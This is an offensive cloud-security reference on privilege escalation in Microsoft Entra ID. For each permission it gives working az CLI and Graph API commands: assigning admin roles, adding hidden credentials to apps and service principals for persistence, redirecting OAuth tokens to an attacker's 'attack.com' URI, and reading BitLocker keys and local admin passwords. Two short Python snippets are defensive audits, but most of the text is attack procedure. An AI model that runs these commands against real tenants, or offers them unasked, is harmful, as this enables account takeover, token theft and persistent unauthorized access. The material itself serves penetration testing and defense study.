Az - EntraID Privesc


Note: Keep in mind that not all the granular permissions built into Entra ID roles are allowed to be used in custom roles.

Roles

Role: Privileged Role Administrator

This role contains the granular permissions needed to assign roles to principals and to grant more permissions to roles. Both actions can be abused to escalate privileges.

  • Assign a role to a user:

```bash
# List enabled built-in roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"

# Give role (Global Administrator?) to a user
roleId="<roleId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \
--headers "Content-Type=application/json" \
--body "{
  \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"
```

  • Add more permissions to a role:

```bash
# List only custom roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'

# Change the permissions of a custom role
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \
--headers "Content-Type=application/json" \
--body '{
  "description": "Update basic properties of application registrations",
  "rolePermissions": [
    {
      "allowedResourceActions": [
        "microsoft.directory/applications/credentials/update"
      ]
    }
  ]
}'
```

Applications

microsoft.directory/applications/credentials/update

This allows an attacker to add credentials (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and obtain those permissions.

```bash
# Generate a new password without overwriting the existing ones
az ad app credential reset --id <appId> --append
# Generate a new certificate without overwriting the existing ones
az ad app credential reset --id <appId> --create-cert
```

microsoft.directory/applications.myOrganization/credentials/update

This allows the same actions as applications/credentials/update, but scoped to applications of the same directory.

```bash
az ad app credential reset --id <appId> --append
```

microsoft.directory/applications/owners/update

By adding themselves as an owner, an attacker can modify the application, including its credentials and permissions.

```bash
az ad app owner add --id <AppId> --owner-object-id <UserId>
az ad app credential reset --id <appId> --append

# You can check the owners with
az ad app owner list --id <appId>
```

microsoft.directory/applications/allProperties/update

An attacker could add a redirect URI to applications used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user had already consented to the application, the authentication will complete automatically without the user needing to accept anything.

Note that it's also possible to modify the permissions the application requests in order to obtain more permissions, but in that case the user will need to accept again the prompt asking for all the permissions.

```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
# Add a new redirect URI (make sure to keep the configured ones)
az ad app update --id <app-id> --web-redirect-uris "https://original.com/callback https://attack.com/callback"
```
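A review check for the scenario above, added here as an example and not part of the original page: it takes the JSON list that `az ad app show --query "web.redirectUris"` prints (a constructed sample is embedded) together with an assumed list of domains the tenant controls, and returns the redirect URIs a reviewer should look at, i.e. hosts outside those domains or URIs not served over https.

```python
from urllib.parse import urlparse

# Constructed sample: the JSON list that `az ad app show --query "web.redirectUris"`
# prints for one app registration. Domains and URIs are made up for this example.
SAMPLE_REDIRECT_URIS = [
    "https://portal.example-corp.com/callback",
    "https://login.example-corp.com/auth/cb",
    "https://attack.invalid/callback",
    "http://portal.example-corp.com/callback",
]

# Assumed: hostnames (and their subdomains) this tenant expects to redirect to.
TRUSTED_DOMAINS = ["example-corp.com"]


def untrusted_redirect_uris(uris, trusted_domains):
    """Return (uri, reason) pairs for redirect URIs that should be reviewed.

    A URI is flagged when its host is not one of the trusted domains (or a
    subdomain of one), or when it is not served over https, since either case
    lets an authorization response be delivered to a host outside the
    tenant's control.
    """
    findings = []
    for uri in uris:
        parsed = urlparse(uri)
        host = (parsed.hostname or "").lower()
        trusted = any(host == d or host.endswith("." + d) for d in trusted_domains)
        if not trusted:
            findings.append((uri, "host outside trusted domains"))
        elif parsed.scheme != "https":
            findings.append((uri, "not https"))
    return findings


if __name__ == "__main__":
    for uri, reason in untrusted_redirect_uris(SAMPLE_REDIRECT_URIS, TRUSTED_DOMAINS):
        print(f"REVIEW {uri}: {reason}")
```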

Service Principals

microsoft.directory/servicePrincipals/credentials/update

This allows an attacker to add credentials to existing service principals. If the service principal has high privileges, the attacker can take over those privileges.

```bash
az ad sp credential reset --id <sp-id> --append
```

Caution: The newly generated password won't be shown in the web console, so this could be a stealthy way to maintain persistence over a service principal.
From the API they can be found with: az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

If you get the error "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." it's because it's not possible to modify the passwordCredentials property of the SP and you first need to unlock it. To do so you need the permission (microsoft.directory/applications/allProperties/update) that allows you to run:

```bash
# The lock configuration lives on the application object, so use the app's object id here
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<app-object-id> --body '{"servicePrincipalLockConfiguration": null}'
```
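A defender-side inventory of the credentials the caution above talks about, added here as an example and not part of the original page: it parses the JSON that the `az ad sp list --query ...` command prints (a constructed sample is embedded) and returns one finding per key or password credential attached directly to a service principal, with its expiry state, so credentials that never appear in the portal still get reviewed.

```python
import json
from datetime import datetime, timezone

# Constructed sample in the shape printed by the `az ad sp list --query ...` command
# above: one [displayName, appId, keyCredentials, passwordCredentials] row per SP.
# Names, ids and dates are made up for this example.
SAMPLE_AZ_SP_LIST = json.dumps([
    ["billing-sync", "00000000-0000-0000-0000-000000000001", [],
     [{"keyId": "k-1", "displayName": None, "endDateTime": "2031-01-01T00:00:00Z"}]],
    ["legacy-connector", "00000000-0000-0000-0000-000000000002",
     [{"keyId": "k-2", "displayName": "CN=connector", "endDateTime": "2020-01-01T00:00:00Z"}],
     []],
])


def _parse_ts(value):
    """Parse a Graph timestamp such as 2031-01-01T00:00:00Z into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def audit_sp_credentials(az_output, as_of=None):
    """Return one finding per credential attached directly to a service principal.

    az_output is the JSON text printed by the az query; as_of is an optional
    ISO timestamp used instead of the current time when deciding expiry.
    """
    now = _parse_ts(as_of) if as_of else datetime.now(timezone.utc)
    findings = []
    for display_name, app_id, key_creds, password_creds in json.loads(az_output):
        for kind, creds in (("key", key_creds), ("password", password_creds)):
            for cred in creds:
                findings.append({
                    "sp": display_name,
                    "appId": app_id,
                    "kind": kind,
                    "keyId": cred.get("keyId"),
                    "expired": _parse_ts(cred["endDateTime"]) < now,
                })
    return findings


if __name__ == "__main__":
    for f in audit_sp_credentials(SAMPLE_AZ_SP_LIST):
        state = "EXPIRED" if f["expired"] else "active"
        print(f"{f['sp']} ({f['appId']}): {f['kind']} credential {f['keyId']} is {state}")
```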

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

This allows an attacker to add credentials to existing service principals. If the service principal has high privileges, the attacker can take over those privileges.

```bash
az ad sp credential reset --id <sp-id> --append
```

microsoft.directory/servicePrincipals/owners/update

As with applications, this permission allows adding more owners to a service principal. Owning a service principal allows controlling its credentials and permissions.

```bash
# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
  \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>
```

Caution: After adding a new owner I tried to remove it, but the API responded that the DELETE method wasn't available, even though it's the method you need to use to remove an owner. So you can't remove owners nowadays.

microsoft.directory/servicePrincipals/disable and enable

These permissions allow disabling and enabling service principals. An attacker could use this permission to enable a service principal that might have some kind of access in order to escalate privileges.

Note that with this technique the attacker will need additional permissions to take control of the enabled service principal.

```bash
# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true
```

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

These permissions allow creating and retrieving password single sign-on credentials, which could grant access to third-party applications.

```bash
# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID (the path takes the service principal id, the body the credential id)
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"
```

Groups

microsoft.directory/groups/allProperties/update

This permission allows adding users to privileged groups, leading to privilege escalation.

```bash
az ad group member add --group <GroupName> --member-id <UserId>
```

Note: This permission excludes role-assignable Entra ID groups.

microsoft.directory/groups/owners/update

This permission allows becoming an owner of groups. A group owner can control the group's membership and settings, and thereby escalate privileges through the group.

```bash
az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>
```

Note: This permission excludes role-assignable Entra ID groups.

microsoft.directory/groups/members/update

This permission allows adding members to a group. An attacker could add themselves or a malicious account to privileged groups that grant elevated access.

```bash
az ad group member add --group <GroupName> --member-id <UserId>
```

microsoft.directory/groups/dynamicMembershipRule/update

This permission allows modifying the membership rules of a dynamic group. An attacker could change the dynamic rules so that they are included in privileged groups without being explicitly added.

```bash
groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
  "membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
  "membershipRuleProcessingState": "On"
}'
```

Note: This permission excludes role-assignable Entra ID groups.

Dynamic Groups Privesc

It might be possible for users to escalate privileges by modifying their own properties so that they get added as members of dynamic groups. For more information check:

Az - Dynamic Groups Privesc

Users

microsoft.directory/users/password/update

This permission allows resetting the password of non-admin users, letting an attacker with this capability escalate privileges over other users. This permission can't be granted to custom roles.

```bash
az ad user update --id <user-id> --password "kweoifuh.234"
```

microsoft.directory/users/basic/update

This permission allows modifying user properties. It's common to find dynamic groups that add users based on property values, so this permission could allow a user to set the property value needed to become a member of a specific dynamic group and escalate privileges.

```bash
# e.g. change the manager of a user: the victim's manager reference is set to managerUser
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/users/$managerUser\"}"

# e.g. change the department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"
```

Conditional Access Policies & MFA Bypass

Misconfigured conditional access policies that require MFA could be bypassed, check:

Az - Conditional Access Policies & MFA Bypass

Devices

microsoft.directory/devices/registeredOwners/update

This permission allows attackers to set themselves as owners of devices in order to gain control of, or access to, device-specific settings and data.

```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```

microsoft.directory/devices/registeredUsers/update

This permission allows attackers to link their accounts to devices in order to gain access or bypass security policies.

```bash
deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
```

microsoft.directory/deviceLocalCredentials/password/read

This permission allows attackers to read the local administrator account properties stored for devices joined to Microsoft Entra, including the password.

```bash
# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLCID="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials"
```

BitLocker Keys

microsoft.directory/bitlockerKeys/key/read

This permission allows accessing BitLocker keys, which could let an attacker unlock disks and compromise data confidentiality.

```bash
# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```

Other Interesting Permissions (TODO)

  • microsoft.directory/applications/permissions/update
  • microsoft.directory/servicePrincipals/permissions/update
  • microsoft.directory/applications.myOrganization/allProperties/update
  • microsoft.directory/applications/allProperties/update
  • microsoft.directory/servicePrincipals/appRoleAssignedTo/update
  • microsoft.directory/applications/appRoles/update
  • microsoft.directory/applications.myOrganization/permissions/update
